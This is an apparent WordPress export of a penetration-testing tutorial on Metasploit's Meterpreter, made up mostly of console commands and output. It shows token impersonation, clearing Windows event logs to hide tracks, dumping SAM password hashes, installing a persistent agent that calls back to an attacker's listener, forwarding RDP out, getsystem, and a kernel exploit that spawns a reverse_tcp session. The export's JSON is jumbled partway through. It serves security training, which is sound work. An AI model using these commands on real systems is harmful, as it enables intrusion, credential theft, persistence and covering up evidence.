{"id":302,"date":"2021-04-25T19:09:49","date_gmt":"2021-04-25T19:09:49","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?p=302"},"modified":"2021-07-15T03:03:13","modified_gmt":"2021-07-15T03:03:13","slug":"meterpreter","status":"publish","type":"post","link":"https:\/\/sirensecurity.io\/blog\/meterpreter\/","title":{"rendered":"Meterpreter."},"content":{"rendered":"\n
\"\"
\n

S1REN<\/p>\n\n\n\n



Yes, It's a better shell.<\/p>\n<\/div><\/div>\n\n\n\n

\"\"

[<\/strong> + ]<\/strong> Meterpreter Basics.<\/strong>
https:\/\/www.offensive-security.com\/metasploit-unleashed\/meterpreter-basics\/<\/a>

[<\/strong> + ]<\/strong> Setting up a handler.<\/strong>
use exploit\/multi\/handler
show payloads
Find your meterpreter payload to listen for.

[<\/strong> + ]<\/strong> Change directory on both victim and attacking machines.<\/strong>
--><\/strong> Local Change Directory (Attacking Machine):
lcd \/localDir\/
--><\/strong> Change directory in your shell (Vitim Machine):
cd

[<\/strong> + ]<\/strong> Token Impersonation:<\/strong>
https:\/\/www.offensive-security.com\/metasploit-unleashed\/fun-incognito\/<\/a>
<\/p>\n\n\n\n

meterpreter><\/strong> use incognito<\/strong>\nLoading extension incognito...success.\nmeterpreter><\/strong> help<\/strong>\n\nIncognito Commands\n==================\n\n    Command              Description                                             \n    -------              -----------                                             \n    add_group_user       Attempt to add a user to a global group with all tokens \n    add_localgroup_user  Attempt to add a user to a local group with all tokens  \n    add_user             Attempt to add a user with all tokens                   \n    impersonate_token    Impersonate specified token                             \n    list_tokens          List tokens available under current user context        \n    snarf_hashes         Snarf challenge\/response hashes for every token         \n\nmeterpreter><\/strong><\/pre>\n\n\n\n
\"What we will need to do first is identify if there are any valid tokens on this system. Depending on the level of access that your exploit provides, you are limited in the tokens you are able to view. When it comes to token stealing, SYSTEM is king. As SYSTEM, you are allowed to see and use any token on the box.\"

--><\/strong> Pro Tip - Administrators don\u2019t have access to all the tokens either, but they do have the ability to migrate to SYSTEM processes, effectively making them SYSTEM and able to see all the tokens available.<\/p>\n\n\n\n
meterpreter><\/strong> list_tokens<\/strong> -u<\/strong>\n\nDelegation Tokens Available\n========================================\nNT AUTHORITY\\LOCAL SERVICE\nNT AUTHORITY\\NETWORK SERVICE\nNT AUTHORITY\\SYSTEM\nSNEAKS.IN<\/strong>\\Administrator<\/strong>\n\nImpersonation Tokens Available<\/strong>\n========================================\nNT AUTHORITY\\ANONYMOUS LOGON\n\nmeterpreter><\/strong><\/pre>\n\n\n\n
meterpreter><\/strong> impersonate_token SNEAKS.IN<\/strong>\\\\Administrator<\/strong>\n[+] Delegation token available\n[+] Successfully impersonated user SNEAKS.IN<\/strong>\\Administrator<\/strong>\nmeterpreter><\/strong> getuid<\/strong>\nServer username: SNEAKS.IN<\/strong>\\Administrator\nmeterpreter><\/strong><\/pre>\n\n\n\n
meterpreter><\/strong> shell<\/strong>\nProcess 2804 created.\nChannel 1 created.\nMicrosoft Windows XP [Version 5.1.2600]\n(C) Copyright 1985-2001 Microsoft Corp.\n\nC:\\WINDOWS\\system32> whoami<\/strong>\nwhoami\nSNEAKS.IN<\/strong>\\administrator<\/strong>\n\nC:\\WINDOWS\\system32><\/pre>\n\n\n\n
Done!


[<\/strong> + ]<\/strong> Is it possible for me to run an exploit through meterpreter as a background job?<\/strong>
--><\/strong> Yup.
meterpreter><\/strong> run -j
[*] Exploit running as background job.
<\/a>

[<\/strong> + ]<\/strong> Lets clear our tracks.<\/strong><\/p>\n\n\n\n
meterpreter><\/strong> clearev<\/strong>\n[*] Wiping 97 records from Application...\n[*] Wiping 415 records from System...\n[*] Wiping 0 records from Security...\nmeterpreter><\/strong><\/pre>\n\n\n\n
Nice.<\/em>

[<\/strong> + ]<\/strong> File Transfer:<\/strong><\/p>\n\n\n\n
meterpreter><\/strong> download<\/strong> C:\\\\boot.ini\n[*] downloading: C:\\boot.ini -> C:\\boot.ini\n[*] downloaded : C:\\boot.ini -> C:\\boot.ini\/boot.ini\nmeterpreter><\/strong><\/pre>\n\n\n\n
Similarly, we can perform uploads to the target system with the 'upload' command. This will expect an absolute path on your local file system to the file you wish you transfer over.

+ How can I execute something on the target machine?<\/strong><\/p>\n\n\n\n
meterpreter><\/strong> execute<\/strong> -f cmd<\/strong>.exe<\/strong> -i -H\nProcess 38320 created.\nChannel 1 created.\nMicrosoft Windows XP [Version 5.1.2600]\n(C) Copyright 1985-2001 Microsoft Corp.\n\nC:\\WINDOWS\\system32><\/strong><\/pre>\n\n\n\n
In this case, we execute cmd.exe on the target machine and specify that we want to interact with the process.

[<\/strong> + ]<\/strong> Lets dump some hashes from the SAM Database.<\/strong><\/p>\n\n\n\n
meterpreter><\/strong> run post\/windows\/gather\/hashdump \n\n[*] Obtaining the boot key...\n[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...\n[*] Obtaining the user list and keys...\n[*] Decrypting user keys...\n[*] Dumping password hashes...\n\nAdministrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::\ndook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nHelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::\nSUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::\nvictim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::\nmeterpreter><\/strong><\/pre>\n\n\n\n
Or you can just type hashdump<\/code>...


[<\/strong> + ]<\/strong> Migrate to a more stable process.<\/strong><\/p>\n\n\n\n
meterpreter><\/strong> run post\/windows\/manage\/migrate <\/strong>\n\n[*] Running module against V-MAC-XP\n[*] Current server process: svchost.exe (1076)\n[*] Migrating to explorer.exe...\n[*] Migrating into process ID 816\n[*] New server process: Explorer.EXE (816)\nmeterpreter><\/strong><\/pre>\n\n\n\n
You can also specify to migrate to some PID. For example - use cmd.exe to open notepad and then grab the PID to migrate to it with: migrate <PID><\/strong><\/code>

[<\/strong> + ]<\/strong> Lets Install a persistent service.<\/strong><\/p>\n\n\n\n
meterpreter><\/strong> run persistence -U -i 5 -p 443 -r <LHOST>\n[*] Creating a persistent agent: LHOST=LHOST LPORT=443 (interval=5 onboot=true)\n[*] Persistent agent script is 613976 bytes long\n[*] Uploaded the persistent agent to C:\\WINDOWS\\TEMP\\yyPSPPEn.vbs\n[*] Agent executed with PID 492\n[*] Installing into autorun as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\YeYHdlEDygViABr\n[*] Installed into autorun as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\YeYHdlEDygViABr\n[*] For cleanup use command: run multi_console_command -rc \/root\/.msf4\/logs\/persistence\/XEN-XP-SP2-BARE_20100821.2602\/clean_up__20100821.2602.rc\nmeterpreter><\/strong><\/pre>\n\n\n\n
\"We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try to connect back to our listener every 5 seconds at IP address <LHOST> on port 443.\"
https:\/\/www.offensive-security.com\/metasploit-unleashed\/meterpreter-service\/<\/a>


[<\/strong> + ]<\/strong> Can we forward out a local port with meterpreter to 0.0.0.0 on our attacking machine?<\/strong>
--><\/strong> Yup.<\/p>\n\n\n\n
meterpreter><\/strong> portfwd -h<\/strong>\nUsage: portfwd [-h] [add | delete | list | flush] [args]\nOPTIONS:\n     -L >opt>  The local host to listen on (optional).\n     -h        Help banner.\n     -l >opt>  The local port to listen on.\n     -p >opt>  The remote port to connect on.\n     -r >opt>  The remote host to connect on.\nmeterpreter><\/strong><\/pre>\n\n\n\n
[<\/strong> + ]<\/strong> Lets forward out the RDP Service on the Victim Machine! For fun?
https:\/\/www.offensive-security.com\/metasploit-unleashed\/portfwd\/<\/a><\/p>\n\n\n\n
meterpreter><\/strong> portfwd add \u2013l 3389 \u2013p 3389 \u2013r <TARGET IP>\n[*] Local TCP relay created: 0.0.0.0:3389 >-> <TARGET IP>:3389\nmeterpreter><\/strong> <\/pre>\n\n\n\n
--> <\/strong>Then, on your attacking machine:
rdesktop 0.0.0.0


+ Privilege Escalation with Meterpreter?<\/strong>
https:\/\/www.offensive-security.com\/metasploit-unleashed\/privilege-escalation\/<\/a>

--><\/strong> priv<\/p>\n\n\n\n
meterpreter><\/strong> use priv<\/strong>\nLoading extension priv...success.\nmeterpreter><\/strong><\/pre>\n\n\n\n

--><\/strong> getsystem<\/p>\n\n\n\n
meterpreter><\/strong> getsystem<\/strong>\n...got system (via technique 1).\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM<\/strong>\nmeterpreter><\/strong><\/pre>\n\n\n\n


[<\/strong> + ]<\/strong> Local Exploits<\/strong><\/p>\n\n\n\n
meterpreter><\/strong> background<\/strong>\n[*] Backgrounding session 1...\nmsf exploit(ms10_002_aurora)><\/strong> use exploit\/windows\/local\/\n...snip...\nuse exploit\/windows\/local\/bypassuac\nuse exploit\/windows\/local\/bypassuac_injection\n...snip...\nuse exploit\/windows\/local\/ms10_015_kitrap0d\nuse exploit\/windows\/local\/ms10_092_schelevator\nuse exploit\/windows\/local\/ms11_080_afdjoinleaf\nuse exploit\/windows\/local\/ms13_005_hwnd_broadcast\nuse exploit\/windows\/local\/ms13_081_track_popup_menu\n...snip...\nmsf exploit(ms10_002_aurora)><\/strong><\/pre>\n\n\n\n
Example:<\/strong><\/em><\/p>\n\n\n\n
msf exploit(ms10_002_aurora)><\/strong> use exploit<\/strong>\/windows<\/strong>\/local<\/strong>\/ms10_015_kitrap0d<\/strong>\nmsf exploit(ms10_015_kitrap0d)><\/strong> set SESSION 1<\/strong>\nmsf exploit(ms10_015_kitrap0d)><\/strong> set PAYLOAD windows\/meterpreter\/reverse_tcp\nmsf exploit(ms10_015_kitrap0d)><\/strong> set LHOST 192.168.1.5\nmsf exploit(ms10_015_kitrap0d)><\/strong> set LPORT 4443\nmsf exploit(ms10_015_kitrap0d)><\/strong> show options<\/strong>\n\nModule options (exploit\/windows\/local\/ms10_015_kitrap0d):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   SESSION  1                yes       The session to run this module on.\n\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)\n   LHOST     192.168.1.5      yes       The listen address\n   LPORT     4443             yes       The listen port\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Windows 2K SP4 - Windows 7 (x86)\n\n\nmsf exploit(ms10_015_kitrap0d) > exploit\n\n[*]  Started reverse handler on 192.168.1.161:4443 \n[*]  Launching notepad to host the exploit...\n[+]  Process 4048 launched.\n[*]  Reflectively injecting the exploit DLL into 4048...\n[*]  Injecting exploit into 4048 ...\n[*]  Exploit injected. Injecting payload into 4048...\n[*]  Payload injected. Executing exploit...\n[+]  Exploit finished, wait for (hopefully privileged) payload execution to complete.\n[*]  Sending stage (769024 bytes) to 192.168.1.71\n[*]  Meterpreter session 2 opened (192.168.1.161:4443 -> 192.168.1.71:49204) at 2014-03-11 11:14:00 -0400\n\nmeterpreter><\/strong> getuid<\/strong>\nServer username: NT AUTHORITY\\SYSTEM<\/strong>\nmeterpreter><\/strong><\/pre>\n\n\n\n
[ + ] Meterpreter Basics.https:\/\/www.offensive-security.com\/metasploit-unleashed\/meterpreter-basics\/ [ + ] Setting up a handler.use exploit\/multi\/handlershow payloadsFind your meterpreter payload to listen for. [ + ] Change directory on both victim and attacking machines.--> Local Change Directory (Attacking Machine):lcd \/localDir\/--> Change directory in your shell (Vitim Machine):cd [ + ] Token Impersonation:https:\/\/www.offensive-security.com\/metasploit-unleashed\/fun-incognito\/ meterpreter> use incognito Loading extension incognito...success. […]<\/p>\n","protected":false},"author":1,"featured_media":303,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[50,46,51,48,52,4,47,34,45,49],"class_list":["post-302","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-s1ren","tag-metasploit","tag-meterpreter","tag-msf","tag-persistence","tag-post-exploitation","tag-s1ren","tag-service","tag-siren","tag-siren-security","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=302"}],"version-history":[{"count":5,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/302\/revisions"}],"predecessor-version":[{"id":415,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/posts\/302\/revisions\/415"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media\/303"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/categories?post=302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/tags?post=302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

Nice.<\/em>


[<\/strong> + ]<\/strong> Windows \/ Linux Post Modules<\/strong> (Meterpreter Enumeration<\/em>)
https:\/\/www.offensive-security.com\/metasploit-unleashed\/post-module-reference\/<\/a>

[<\/strong> + ]<\/strong> Not gonna lie, just check this out: for Windows Post:<\/strong>
https:\/\/www.offensive-security.com\/metasploit-unleashed\/windows-post-gather-modules\/<\/a>

[<\/strong> + ]<\/strong> Same applies for Linux Post:<\/strong>
https:\/\/www.offensive-security.com\/metasploit-unleashed\/linux-post-gather-modules\/<\/a>

[<\/strong> + ]<\/strong> Interested in Powershell and Meterpreter?<\/strong>
https:\/\/www.trustedsec.com\/blog\/interactive-powershell-sessions-within-meterpreter\/<\/a>

tada<\/em>!<\/p>\n","protected":false},"excerpt":{"rendered":"